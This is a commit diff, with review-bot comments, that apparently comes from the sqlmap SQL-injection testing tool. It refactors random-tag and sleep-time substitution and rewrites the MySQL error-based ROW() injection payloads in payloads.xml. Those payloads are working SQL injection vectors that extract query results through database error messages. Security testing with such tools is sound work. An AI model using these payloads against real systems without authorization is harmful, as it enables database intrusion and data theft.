

Commit 2538e2d

committed
fixing an issue with --file-read and ROW() MySQL payload (its internal caching mechanism prevents the error message if the FROM part is not unique enough, dumping only partial file content); minor refactoring
1 parent 2c057d5 commit 2538e2d

6 files changed

Lines changed: 20 additions & 21 deletions


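--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -488,9 +488,6 @@ def genCmpPayload():
 if vector is None and "vector" in test and test.vector is not None:
 vector = "%s%s" % (test.vector, comment or "")
 
-if method == PAYLOAD.METHOD.TIME:
-reqPayload = reqPayload.replace(test.request.payload.replace("[SLEEPTIME]", str(conf.timeSec)), test.request.payload)
-
 injection.data[stype] = AttribDict()
 injection.data[stype].title = title
 injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload)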
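Review bot: With the TIME-specific normalisation dropped, `injection.data[stype].payload` on the last line of the hunk now keeps the literal `[SLEEPTIME]` tag, so every reader of that field must pass it through `agent.adjustLateValues` before displaying or replaying it; `__formatInjection` in lib/controller/controller.py does so in this commit, but the contract is not recorded at the point where the value is stored. A one-line comment at the assignment would make it explicit: `# payload keeps late tags such as [SLEEPTIME]; resolve via agent.adjustLateValues() before use`. The enclosing function starts before and continues after the hunk, so where reqPayload is built is not visible here.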

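--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -138,7 +138,7 @@ def __formatInjection(inj):
 title = title.replace("columns", "column")
 data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
 data += " Title: %s\n" % title
-data += " Payload: %s\n" % (sdata.payload if stype not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) else sdata.payload.replace("[SLEEPTIME]", str(conf.timeSec)))
+data += " Payload: %s\n" % agent.adjustLateValues(sdata.payload)
 data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
 
 return data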

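--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -212,20 +212,19 @@ def cleanupPayload(self, payload, origValue=None):
 if payload is None:
 return
 
-randInt = randomInt()
-randInt1 = randomInt()
-randInt2 = randomInt()
-randStr = randomStr()
-randStr1 = randomStr()
-
 _ = (
-("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDNUM2]", str(randInt2)), ("[RANDSTR]", randStr),\
-("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
+("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
 ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
 ("[HASH_REPLACE]", kb.chars.hash_)
 )
 payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
 
+for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
+payload = payload.replace(_, str(randomInt()))
+
+for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
+payload = payload.replace(_, randomStr())
+
 if origValue is not None:
 payload = payload.replace("[ORIGVALUE]", origValue)
 
@@ -249,12 +248,15 @@ def cleanupPayload(self, payload, origValue=None):
 
 return payload
 
-def adjustSleepTime(self, payload):
+def adjustLateValues(self, payload):
 """
-Returns payload with a replaced tag for SLEEPTIME
+Returns payload with a replaced late tags (e.g. SLEEPTIME)
 """
 
-return payload.replace("[SLEEPTIME]", str(conf.timeSec)) if payload else payload
+if payload:
+payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
+
+return payload
 
 def getComment(self, request):
 """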
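Review bot: The two new loops in cleanupPayload reuse `_` both as the substitution table that `reduce` consumes and as the loop variable for each matched tag, which makes the first hunk harder to read than it needs to be; naming the loop variable, e.g. `for tag in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):` followed by `payload = payload.replace(tag, str(randomInt()))`, and the same for the RANDSTR loop, keeps the intent clear. Since the match is case-insensitive but `str.replace` is exact, a short comment noting that every distinct spelling of a tag found in the payload gets its own fresh value would help the next reader. The docstring added in the second hunk reads `Returns payload with a replaced late tags (e.g. SLEEPTIME)`; `Returns payload with late tags (e.g. [SLEEPTIME]) replaced` is the grammatical form. cleanupPayload's body continues between the two hunks, and getComment begins at the end of the section.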

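--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -540,7 +540,7 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent
 
 raise404 = place != PLACE.URI if raise404 is None else raise404
 
-value = agent.adjustSleepTime(value)
+value = agent.adjustLateValues(value)
 payload = agent.extractPayload(value)
 threadData = getCurrentThreadData()
 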

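--- a/lib/request/direct.py
+++ b/lib/request/direct.py
@@ -28,7 +28,7 @@
 def direct(query, content=True):
 select = True
 query = agent.payloadDirect(query)
-query = agent.adjustSleepTime(query)
+query = agent.adjustLateValues(query)
 threadData = getCurrentThreadData()
 
 if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query: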

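--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1215,9 +1215,9 @@ Formats:
 <risk>0</risk>
 <clause>1</clause>
 <where>1</where>
-<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</vector>
+<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</vector>
 <request>
-<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</payload>
+<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</payload>
 </request>
 <response>
 <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1433,9 +1433,9 @@ Formats:
 <risk>2</risk>
 <clause>1</clause>
 <where>2</where>
-<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</vector>
+<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</vector>
 <request>
-<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</payload>
+<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</payload>
 </request>
 <response>
 <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>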
